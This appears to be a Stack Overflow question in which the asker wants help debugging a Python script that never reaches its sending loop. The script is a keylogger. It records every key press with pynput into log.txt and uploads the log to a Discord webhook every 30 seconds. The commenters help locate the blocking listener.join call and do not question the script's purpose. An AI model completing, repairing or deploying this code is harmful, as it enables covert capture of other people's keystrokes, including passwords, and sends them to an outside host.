# Why are the statements under While True: not executing?

Tags: python

Everything under the While True: will not execute for some reason even though before hand it was working just fine and I'm using visual studio code.

```
import time
import schedule
from pynput.keyboard import Key, Listener
from discord_webhook import DiscordWebhook, DiscordEmbed
from colorama import Fore, Back, Style


webhook = DiscordWebhook(url='url')


def on_press(Key):
     with open("log.txt", "a") as f:
        f.write(str(Key)+'\n')


with Listener(on_press=on_press) as listener:
    listener.join()

with open("log.txt") as f:
    webhook.add_file(file=f.read(), filename='log.txt')


while True:
 localtime = time.asctime( time.localtime(time.time()) )
 response = webhook.execute()
 print (Fore.GREEN + "Log Update Sent", localtime)
 time.sleep(30)
```

Comment: It's probably stuck on listener.join.  You could add some print() before and after various points to see where it's getting hung up.

Comment: How do you know it isn't executed? Does the program end?

Comment: @MichaelButscher When it is first executed it runs everything under while True: and in there a print command is supposed to go off which isn't happening and the discord webhook also isn't sending.

Comment: @Max i just checked and I found that it is getting hung up at the listener.join How do I fix this?